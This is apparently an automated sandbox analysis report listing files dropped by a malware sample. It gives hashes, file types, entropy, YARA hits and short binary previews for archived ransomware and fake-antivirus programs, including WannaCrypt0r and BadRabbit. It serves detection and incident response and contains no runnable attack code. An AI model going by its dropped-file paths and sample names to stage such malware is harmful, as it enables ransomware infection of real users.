                                                                                                                                                Preview:PK..3...c.).#M....!....... ...Endermanch@SmartDefragmenter.exe......AE.....@.97@..g\7.B..y.u^RG)...\M..x^VB...l`..h...W.P8.B.:..(O....V.)6.%...:..X.,...'<.....rB.....GQ%.p|.p"K..h.x..t..Q...".n...U...S.t...?.6......]Z..z....#a.(.v]A._R./...kJW....i.:.q_H.s{S..LA.X.O...~...C.."..r.o..B.4........k.X........B.j.....J.Da...."..,6.....g_../%F.N$Wj...U...J.nRr......].....EN...V@{(......C.p.Z.|N(J)T..\.......fv.6.F~.b.........)........@[..0.F.f...G5..3L1......:..u.G..AjF...8.er..jX+J.i......'hA..>#^..*6...-/.XG...\.rs.5....FO..P....<.ePA..&...T%....S..l.wT6.....s.]K2pKnr.~+.....Lc.....>.d7R...#.. .Oz....9....).2k-.R`...^...|.....|dXS....rd..N].m8..#..|..y+...?...E... .......f...RG..F/F.K4....J.a.#2.Pc..S..d..?......Q...0..#.h...R.N...AJo._9.r.~....r.V...5..Fx.....A..y.R..m. .D.^..Q...-...L....v...%.E.....9.r,.:.C..l.9..LF.....;....*i.a..o...*...v.._......r.=z......={h.*Y.8..i.....;bK2....ORr.p........n.....]b.C`....".&..qD.y..t.5....}.kG...;....u=.
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):784070
                                                                                                                                                Entropy (8bit):7.999747224972193
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:12288:qfdxMBL8UIO+V+uEVAr7O79u5WjsPtBaZf/SzSVbYnOv/tnNriQ7QkmgVYDlbg1b:qfU5IO+kWr7O7QwsVAZyz6Yn2t5JsZgD
                                                                                                                                                MD5:B698AEFA1322550E130867CBD69CE67B
                                                                                                                                                SHA1:74C12404ED33CFD13B58606757F9FF0E06650C41
                                                                                                                                                SHA-256:A2247754D4305D00900DA86B8957562696F80AE025C8D8EAC27F38E4023E7F89
                                                                                                                                                SHA-512:B1242E7CD5506955D6D999213F98F16321CB866F7FC6A14ED9D11E1A8735C9B4632E9E8CB83073797B5ACE91B963D57BBBB63EF8D3640C1048C962778834B5BB
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK..3...c.s..:........s.......Endermanch@VAV2008.exe......AE...,.jM......`.n...[.7........33.Y.-....?x.so.X_.!s#7lN..*.Z..5...6I.y.vO.q>.1....>.J...g..g..[...o....br.&..#...'k.U..b..V~W.2...!..x,....!..8..5,....g.w[.).>..5..-]3+......8C........S..(gn&2......M.w@a..y0.~#.1r...li42.d.Ahoq>.OcB82<..JRN....)...X.8]..V.....8...,..<...J.}...............:..1...h^.*.nBn.f..*....zA.(...).2.K.l.Jv.%ZD....Mx7b .~....A....".....q;.]A.....X...?...7.:D.....$..........g.tw..`2.7.T...(.v.8.._^......X...m{.=.M.._6..B".....)D.H.....awI.h..o....0+..YO._.i.4...C&.....%..q,...Z.>.^_7.6tC.<.....P{.[.4...3Xo........d...Q.>,4...o....Z....,.._Jk.....Q.V.....>...D.Yb.]{h-s~<.bK.NIl.y.`.I^W.'.9.l..e...k.U(.E.D.......P..^.<Q...U.KBA....~...d..x.6b......l.g.s...A..DVQ.8.....Zi.F.#...8..*[).@....K...H0.......k..T%.`f#e.N}!{ o.0..<=4.....~9q....V.G.6...c46...L....".....).sx`..........F...6.%N.b.....)...f.\.*HY.k..[..a...J.D.-.ev....vPc)t"....b....+..Z.A_V...H..=r.v..G..|.4..p
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):135339
                                                                                                                                                Entropy (8bit):7.998464822213335
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:3072:EVGcVUZ2RO+vvmYYN4ul1c0wTLcc0JuEzXiXoNn59cz+P+gJmq:EFVOYM4IwUc0JpzXYorWyL
                                                                                                                                                MD5:6A47990541C573D44444F9AD5AA61774
                                                                                                                                                SHA1:F230FFF199A57A07A972E2EE7169BC074D9E0CD5
                                                                                                                                                SHA-256:B161C762C5894D820CC10D9027F2404A6FEC3BC9F8FD84D23FF1DAEF98493115
                                                                                                                                                SHA-512:FE8A4FD268106817EFC0222C94CB26AD4AE0A39F99AACAA86880B8A2CAA83767FFE8A3DD5B0CDCC38B61F1B4D0196064856BD0191B9C2D7A8D8297C864A7716D
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK..3...c..7yE................Endermanch@ViraLock.exe......AE....d...EJK.k....+.$?.X;....g.........>.jO..y.p:.d....~.......Y.y.....Q.....iy...\...}.....V.sL..@t...<....au.l=i.q..w..*..`..h.a.........3\.0.ox.i...C..f.=.E.....>..A....2.X.#.qml>...5.YLj]!Id.#...A .1n{8.D?.P5..<.G[.R...P.j..m<$...O.\v...%...R..s.M......:.;......*....!:.:-.5.p.....d%..C....^n.....,.l.qWN..T...rW.~zlz...<H....?.....m.so.e..*.k........?..bI....c.R...j...3...g.D.O.&B.".?)Z..=.y...J.^s.Z.....f.n...J..d7..&]...&..N.}e1......2w.w.:..C9W..B.T_..%.4....y.qa...Q'ry.f...;KY;e..VN...PE|..d....T....d..{........(..r..b1.R....J^...E.H|.B.q(..`.3.....Ge.........D...........R...>....?.#..B..s...Z=..y.E.Ux.m."p.i...p....Y...2..C..3].q.7...i7.C.Y.Eo...z..]... ......)H.;..D......+6.Q.d.o.d.=..e.O..[+...,..siV.1f.........[.....XTh....(.......fmf...m.......T..?....r...O..'#u.=.....Z....|d^..<....n.!.=dwos.|....e......ul.0.z....Bp..7|(~.Q...Z.>.._.V..W....t....2%.....7..+.....B....
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3477754
                                                                                                                                                Entropy (8bit):7.999945362964861
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:49152:0x8KJHkctwJdVlgBq+q1vqtWdhQIajy4AsOLgVv+L3QXz+B7m1qyapDgJmeiTLW:0x8KJX+dVHvtzaj3xWgw79icXW
                                                                                                                                                MD5:E58FDD8B0CE47BCB8FFD89F4499D186D
                                                                                                                                                SHA1:B7E2334AC6E1AD75E3744661BB590A2D1DA98B03
                                                                                                                                                SHA-256:283F40E9D550833BEC101A24FD6FD6FBD9937ED32A51392E818FFFF662A1D30A
                                                                                                                                                SHA-512:95B6567B373EFA6AEC6A9BFD7AF70DED86F8C72D3E8BA75F756024817815B830F54D18143B0BE6DE335DD0CA0AFE722F88A4684663BE5A84946BD30343D43A8C
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK...........J.."@>.5...5.....Endermanch@WannaCrypt0r.exeo..h.....7...8..].}..!..'...4...dl..W......n.g.1x.;..:..$W...)@..]t ...s.I..J...B.:.|.fcJ...HtS..}.X..Pe..0.....f5U.../..^@x.O...i.....c....:no..."m.O.$........<..H..f$...0..G..V.D..y..Wn....2.F......O-..j..&...'V. ...6..p......S.....b<1d.H.W._.d'..4v<M{...0|...CS.Tf...L....+.@kI.PV...ZM.tp..L.....I......!..!.@n..gcSDm,.......{M..-.a._..6`~..:<...DT...f..d.(..."..xOsr.1W..3.*.........lJ...!...=....N..8...zU..J{.n......(:.-V.(.&.n..M.#dkT.....T..O.>.3j.0...U...:). ..`.."1...yQZ..tt....B.....)3e}6.2.b.....q..D...g...?..!...1...6.....U...k..M.J......R..zf..c...&.e2>........L........(P=.......Vp.T..2..&9.U..+..WPT.....u.......0...!DmA..&S....n..d..I.Jz#!..7....vn7.?...~.H...Wy. .7K....#$..q...E{.B.An..>...\..#3bq.H...>;j........].....3_zk..k.......a"S^B.f...D0....<J...4#..MZs......E..._>.L8Kr.0..z.....F...Z..~..!.U.g{X.....i&1....EV.P...C...F((.....)C...I.5oW.....2.c....&...>C0..
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1654828
                                                                                                                                                Entropy (8bit):7.999880621363435
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:49152:2OiR+zJsyziTwWQRtQWgpn8QbX1ncWFwUGVF6VpHk:2OVdzVW4tQWgp8QT1XFwUGKPk
                                                                                                                                                MD5:713F3673049A096EA23787A9BCB63329
                                                                                                                                                SHA1:B6DAD889F46DC19AE8A444B93B0A14248404C11D
                                                                                                                                                SHA-256:A62C54FEFDE2762426208C6E6C7F01EF2066FC837F94F5F36D11A36B3ECDDD5F
                                                                                                                                                SHA-512:810BDF865A25BDE85096E95C697BA7C1B79130B5E589C84AB93B21055B7341B5446D4E15905F7AA4CC242127D9ED1CF6F078B43FE452AD2E40695E5AB2BF8A18
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK..........HpF..`?...R&.#...Endermanch@WinlockerVB6Blacksod.exe....E9u.....!j%..R.l.M7.I......m...............x'...o..2...`.FU}.,..s.DI..|j,.zXxA...B..uG.y....v.d.jx....p.X..c.i.l/!..1..T.._.z0..o......#.A..dA".;'E...Q..F.J....5.X!.~l......<K&..1..oC.'..Y.\....gX..3...CJ.?./0..7[.|d..._...y..X#..a.;......-..2..|..G.%W...\m..Y.&w/....."\......@.R..m<tgZV*...y..9+ ....R.V....7.8t....7..........O PZcW.....e.....7..}.K...4.*.w.DK0...KbV.H..W<......g7.".js.H...f..\...2./KX..@.p........\.F"..S.r.-,.b._E.{...=...w..2;w.&.S..K.Fg[.d#v..R..<L.k.@..<2.t<.5}e...v...rP......6.?T....g..................#.........v......O.l;. ....=.{.m.......C..._..[$A1P.9....h.d.K.m._...:j.....:.kJ..."wz........6.+..yi......e....,5..%....J..k..I...;...s.?..\H..7=.$..VbU.#^........VIS>..Kw=W.YO..;.k.[$3..lM...G4U.9..)=....-.....'.Y......R....=.b.R..j.....?..y.,.......<GT"..Y.Z.....b...s.f.*...I.....[.D..J=...l.p.s3]g,....vD..8.]...QW..^..X.y9..:...I..........xA.oj.....
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):77102
                                                                                                                                                Entropy (8bit):7.997393453617121
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:1536:0Nm7bj9DAfxcbnnOOPjaW7S3ayJpOGtz57MC4Wlzy1vG1NyY/:qAbj9EerOOPjV23ayeGpM+18c
                                                                                                                                                MD5:213743564D240175E53F5C1FEB800820
                                                                                                                                                SHA1:5A64C9771D2E0A8FAF569F1D0FB1A43D289E157C
                                                                                                                                                SHA-256:65F5D46ED07C5B5D44F1B96088226E1473F4A6341F7510495FE108FEF2A74575
                                                                                                                                                SHA-512:8E6B1822B93DF21DD87BF850CF97E1906A4416A20FC91039DD41FD96D97E3E61CEFCD98EEEF325ADBD722D375C257A68F13C4FBCC511057922A37C688CB39D75
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK........;.=>.#.}.,...P......Endermanch@Xyeta.exe.V.t*J...:K.J.....(.T.........zv.....+jQ..s.l..'OZ..5.a.c}..>..+.M.\....C,c...E.L6@ml.D./.&W..f^...`........T.%.u....X......%..F..i...'.F.....R-.8.9f:......d...Gd.B../...&g.c.T..P#.].>w..&S\.i.b.....s..|.....P............[.}..y...h.5]v..a....I..H.?.......B.Z./<.%.S..v...q....#.g,{E.a..&k....]...[8..%.x U#..-.-&R..M._|e.+.1.L.+.%.U!..iK....y6.r%..NR9......F... ..J~..n.]....'.J$+._l'.F..........L....-b.....'...8......0.Q...._...i..=%...M..?.)`t...2..Te....7\'. ..m....~}....d...:%...7FV&..Y..=.xG...*.)9q,....}..u.H.@]7f..T[.....{.....$E.f..x.s.N'(XI..j.X.b\..J..,..I.<.>....!.nW...4..7R{ ..?......PG6.yh....f`..".J B.l...'6.&q_..Fhr@.:..kkbiF...2/q..^.@.DH...s.^..7@...&.....\3.;:.%' .?.......D....C?....A....X.p..i.7.YY:L.JE.{..CYfp...n..<.wXa%}..........X.#I....:.eu.....:......FMUk.l.O'...'....].*^.95..i.F..sB..A.ZG.]/...+.....3.r6.8*l.....G8A4}.C..1.~....`....|..~....nL>(@..p..~..z.....}Fck..W.....J
                                                                                                                                                Process:C:\Users\user\Desktop\Endermanch@AnViPC2009.exe
                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Thu Sep 29 20:52:21 2022, mtime=Thu Sep 29 20:52:21 2022, atime=Fri May 28 08:03:30 2010, length=9421312, window=hide
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1129
                                                                                                                                                Entropy (8bit):4.7199948223910795
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:8m1F/24hdOEiTwFwpAsfndH4deUU3iKi/7aB6m:8m1tbhdO7wFwqsfndYdnPB+B6
                                                                                                                                                MD5:306619196677E0576F0416E7FA82236E
                                                                                                                                                SHA1:5A8883A604F9B6C1F123D0FF29B2F2AA5DAE3711
                                                                                                                                                SHA-256:598933CC167A2DB35954ED6433E9710C3E0A10D260640F3C80602C359CA375BD
                                                                                                                                                SHA-512:EE8D805B52733CEEE868A8285EC381941CD372DA07457FFC394D63CFA7145B35BAFA5664BF12DE1FF975FDB7B0705BD21FC74A4A92681F997944ABD016D0E257
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:L..................F.... ... B..M....|..M.....D...............................P.O. .:i.....+00.../C:\.....................1......U...PROGRA~2.........L.=UY.....................V.........P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....h.1.....=U....ANTIVI~1..P......=U..=U............................".Y.a.n.t.i.v.i.r.u.s.p.c.2.0.0.9.....f.2.....<pH .avpc2009.exe..J......=U..=U............................H...a.v.p.c.2.0.0.9...e.x.e.......b...............-.......a...........k[{......C:\Program Files (x86)\antiviruspc2009\avpc2009.exe..9.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.a.n.t.i.v.i.r.u.s.p.c.2.0.0.9.\.a.v.p.c.2.0.0.9...e.x.e.&.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.a.n.t.i.v.i.r.u.s.p.c.2.0.0.9.........*................@Z|...K.J.........`.......X.......040965...........!a..%.H.VZAj.../>...........W...!a..%.H.VZAj.../>...........W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.
                                                                                                                                                Process:C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):22528
                                                                                                                                                Entropy (8bit):7.6355330409141144
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:fIiV728hUQ7Y2P/cVEccDdye7kjlWLe7grPiA8jyrMPhTjanbBoZht0MZaNJawcM:fRGuY2P0Vo6r7SiAwyrMRjbSMcnbcuy8
                                                                                                                                                MD5:8703FF2E53C6FD3BC91294EF9204BACA
                                                                                                                                                SHA1:3DBB8F7F5DFE6B235486AB867A2844B1C2143733
                                                                                                                                                SHA-256:3028A2B0E95143A4CAA9BCD6AE794958E7469A20C6E673DA067958CBF4310035
                                                                                                                                                SHA-512:D5EB8A07457A78F9ACD0F81D2F58BBF64B52183318B87C353A590CD2A3AC3A6EC9C1452BD52306C7CF99F19B6A897B16CEB8289A7D008C5CE3B07EDA9B871204
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$+.I...............2.P........................@.................................................................................................................................................................................................UPX0....................................UPX1.....P.......N..................@....rsrc................P..............@...3.03.UPX!....4.|.....m...s@......&......40...s..*..B]h.F.B.x....../G..03..s.P..b.V..Y4+l.....N..]t#.o.W;..$nl1...+....y...[.j..[..a..;.. 5..6...O"...{_../o.&..W..R..`./Ch.l.C./.|....q.r.........-.{.C.q.>..R*d................8..*X4}....!V...DL.I!lF...kp..5...h.5.3....4.8Q...T.....=...Y..%.&~.6...{...r.\.8=.....-.`.ud..G..%...4.40)z._..BA....}.P.frd.y...^ wkxS......u.(.-tp..&.....@..%....1.r*..X..WQ....r...#.mC...@..|;.].T.|...uYm.J......S1..N....'b.%]i..c.J.I'p.CPp...n...q..
                                                                                                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):62328
                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3::
                                                                                                                                                MD5:C7CA77D847F1802502EF3B9228D388E4
                                                                                                                                                SHA1:80AB09116D877B924DFEC5B6E8EB6D3DDE35869E
                                                                                                                                                SHA-256:FDEF2F6DA8C5E8002FA5822E8E4FEA278FBA66C22DF9E13B61C8A95C2F9D585F
                                                                                                                                                SHA-512:B5C23209597ECDDBCDE6CD8E72392721C3C2848385AD3F4C644024979F777FD11F2DD19E763F443C4759BB339B047034997FB06566CE7D4574CF3E4B75F51B7D
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):609584
                                                                                                                                                Entropy (8bit):6.089159959275534
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:LUVJnkkCKDCUUgdxxnwH8aYvR4+NyEFVUmJ8ts:QvknYJ4xEFCmuu
                                                                                                                                                MD5:821511549E2AAF29889C7B812674D59B
                                                                                                                                                SHA1:3B2FD80F634A3D62277E0508BEDCA9AAE0C5A0D6
                                                                                                                                                SHA-256:F59CDF89F0F522CE3662E09FA847BCA9B277B006C415DCC0029B416C347DB9C4
                                                                                                                                                SHA-512:8B2E805B916E5FBFCCCB0F4189372AEA006789B3847B51018075187135E9B5DB9098F704C1932623F356DB0EE327E1539A9BF3729947E92844A26DB46555E8CD
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......4....N&.....#.....2...........=.......@....+ .........................`.......................................*.......+..:....p...............9.. .......p_...+..................................................d............................text....0.......2.................. ..`.data...8....P.......8..............@....rsrc........p.......V..............@....reloc..p_.......`..................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1066176
                                                                                                                                                Entropy (8bit):6.377536905123536
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:K2woQX9+gWX6b+SHQjxnRC33Oej3zR/QhF7OnVz3S7HM7BHg:5kX9+V6KTpcPhkgVSglg
                                                                                                                                                MD5:714CF24FC19A20AE0DC701B48DED2CF6
                                                                                                                                                SHA1:D904D2FA7639C38FFB6E69F1EF779CA1001B8C18
                                                                                                                                                SHA-256:09F126E65D90026C3F659FF41B1287671B8CC1AA16240FC75DAE91079A6B9712
                                                                                                                                                SHA-512:D375FD9B509E58C43355263753634368FA711F02A2235F31F7FA420D1FF77504D9A29BB70AE31C87671D50BD75D6B459379A1550907FBE5C37C60DA835C60BC1
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."x$9.....@.....#.........l...... ........p....X'.........................P.......................................@...............P...Z.........../...............................................................................................text............................... ..`.data....s.......r..................@....rsrc...4\...P...^...6..............@....reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):9728
                                                                                                                                                Entropy (8bit):6.687856479733953
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:bypFwq/1Z6LKAVkPTDtlkZkH7KtkbT/zRAtO7/G97+vHiu9:bryfAVkvtSZkWaAtpxA9
                                                                                                                                                MD5:CD1800322CCFC425014A8394B01A4B3D
                                                                                                                                                SHA1:171073975EFFDE1C712DFD86309457FD457AED33
                                                                                                                                                SHA-256:8115DE4AD0B7E589852F521EB4260C127F8AFEAA3B0021BFC98E4928A4929AC0
                                                                                                                                                SHA-512:92C22C025FD3A61979FA718BF2E89A86E51BF7E69C421A9534FBF9C2D5B23B7A9224D0E9F3E0501992038837015214D1EF73B532A68B7D19DE559C9AB9C6E5F6
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K..*...*...*...6...*...5...*..t5...*..Rich.*..................PE..L...].;K................. ..........0.............@.........................................................................L...........L...........................................................................................................UPX0....................................UPX1..... ..........................@....rsrc................ ..............@..............................................................................................................................................................................................................................................................................................................................................................................................................................................3.03.UPX!....
                                                                                                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):210632
                                                                                                                                                Entropy (8bit):6.677691827536191
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:zCBsPmcx7BTn/irEsrDUxo2vYsWwYEJOXKVviEWuwlVBgzUMqqDLW+z3AHW5:8sPnBT/irETNWiJOXKVvKBgz3qqDL1zt
                                                                                                                                                MD5:EDB72F4A46C39452D1A5414F7D26454A
                                                                                                                                                SHA1:08F94684E83A27F2414F439975B7F8A6D61FC056
                                                                                                                                                SHA-256:0B2F863F4119DC88A22CC97C0A136C88A0127CB026751303B045F7322A8972F6
                                                                                                                                                SHA-512:D62A19436ABA8B2D181C065076B4AB54D7D8159D71237F83F1AFF8C3D132A80290AF39A8142708ACB468D78958C64F338BA6AD0CAB9FBAC001A6A0BDDC0E4FAA
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: INDICATOR_TOOL_ENC_DiskCryptor, Description: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions, Source: C:\Windows\cscc.dat, Author: ditekSHen
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............~...~...~...~..~.....w.~..x...~..x....~..#...~..#....~..#....~.Rich..~.................PE..d...9.S.........."......\...........0.......................................p............. .................................................0..P....P....... ...............`..t...0d...............................................`..(............................text...WI.......J.................. ..h.rdata...|...`...~...N..............@..H.data....0......."..................@....pdata....... ......................@..HINIT.........0...................... ....rsrc........P......................@..B.reloc..L....`......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):142848
                                                                                                                                                Entropy (8bit):6.314365095327337
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:1keK/MwGT0834YW3pvyh8fcl/iL62iL6KK:Sn/MZd4YW3pvyxl/ini
                                                                                                                                                MD5:B14D8FAF7F0CBCFAD051CEFE5F39645F
                                                                                                                                                SHA1:AFEEE8B4ACFF87BC469A6F0364A81AE5D60A2ADD
                                                                                                                                                SHA-256:8EBC97E05C8E1073BDA2EFB6F4D00AD7E789260AFA2C276F0C72740B838A0A93
                                                                                                                                                SHA-512:F5DCBF3634AEDFE5B8D6255E20015555343ADD5B1BE3801E62A5987E86A3E52495B5CE3156E4F63CF095D0CEDFB63939EAF39BEA379CCAC82A10A4182B8DED22
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: BadRabbit_Gen, Description: Detects BadRabbit Ransomware, Source: C:\Windows\dispci.exe, Author: Florian Roth
                                                                                                                                                • Rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, Description: Bad Rabbit Ransomware, Source: C:\Windows\dispci.exe, Author: Christiaan Beek
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........sR.. R.. R.. I-. v.. I-$ F.. I-. &.. [.9 Q.. [.) C.. R.. ... I-. _.. I- S.. I-' S.. RichR.. ................PE..L...e..Y............................Ug.......0....@.................................a[....@.................................._..........,............................................................[..@............0...............................text...J........................... ..`.rdata..<@...0...B..................@..@.data...,]...........`..............@....rsrc...,............z..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\Endermanch@BadRabbit.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):410760
                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3::
                                                                                                                                                MD5:C4F26ED277B51EF45FA180BE597D96E8
                                                                                                                                                SHA1:E9EFC622924FB965D4A14BDB6223834D9A9007E7
                                                                                                                                                SHA-256:14D82A676B63AB046AE94FA5E41F9F69A65DC7946826CB3D74CEA6C030C2F958
                                                                                                                                                SHA-512:AFC2A8466F106E81D423065B07AED2529CBF690AB4C3E019334F1BEDFB42DC0E0957BE83D860A84B7285BD49285503BFE95A1CF571A678DBC9BDB07789DA928E
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\SysWOW64\wbem\mofcomp.exe
                                                                                                                                                File Type:ASCII text, with CRLF, CR, LF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):439
                                                                                                                                                Entropy (8bit):5.1001950450121525
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:zKZj7VBF7Emi82DYXnT8FyJkA/X2NWOm3viQFut9M:zKZj7VDYmi82DYXYFyJkAusR3KHLM
                                                                                                                                                MD5:B1FA833E1C42E59115092E2C2696398D
                                                                                                                                                SHA1:FC1B7D07CF5957D901A13881EB41854A48B45E00
                                                                                                                                                SHA-256:EBF838FD0C810152A85438F94F3B99286F145A6A3995AA91DC06DC3B767CAA00
                                                                                                                                                SHA-512:733515B22176BBBFBD82E24BC30297AE8A9E0506CC46799A1BD5DEAC9FB8AD68DF33ED54D1CD2FADE5B4E50BDDAAD4F17E702C8ABD807860D03F9597ED0A3B9F
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:Microsoft (R) MOF Compiler Version 10.0.17134.1.Copyright (c) Microsoft Corp. 1997-2006. All rights reserved..Parsing MOF file: C:\Users\user\AppData\Local\Temp\4otjesjty.mof..MOF file has been successfully parsed..Storing data in the repository.....An error occurred while resolving the alias for object 1 defined on lines 6 - 14:..Error Number: 0x80041033, Facility: WMI..Description: Shutting down...Compiler returned error 0x80041033
                                                                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Entropy (8bit):7.938259204345277
                                                                                                                                                TrID:
                                                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                File name:4d44bed6.exe
                                                                                                                                                File size:151552
                                                                                                                                                MD5:f7fad376e883d2bab82fbae91e5874f5
                                                                                                                                                SHA1:76440c8a557e7c1c032f7ccb69f6f133686e8fe4
                                                                                                                                                SHA256:a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6
                                                                                                                                                SHA512:a0d768c2daa5fcdd0ebc2cc20f1379d9b68792dd63cd8f1d64da14df8d8db4e4429e6b14fcee338e303cf67fc0bdb2b8db8f2c6bd837763bb201eaa22dd1690e
                                                                                                                                                SSDEEP:3072:YzS2qulKP62/xAZS6Rt3T4awbhdEyvM3ylfXTkpisd7LT8EB:CS2qaKP62mZS6RZ4aw1dd0ClfD+isd7c
                                                                                                                                                TLSH:90E31254DF0C3BA7DE99C7B50CE4C3454FD08121296EDFAB398495FA66427B2A0432B7
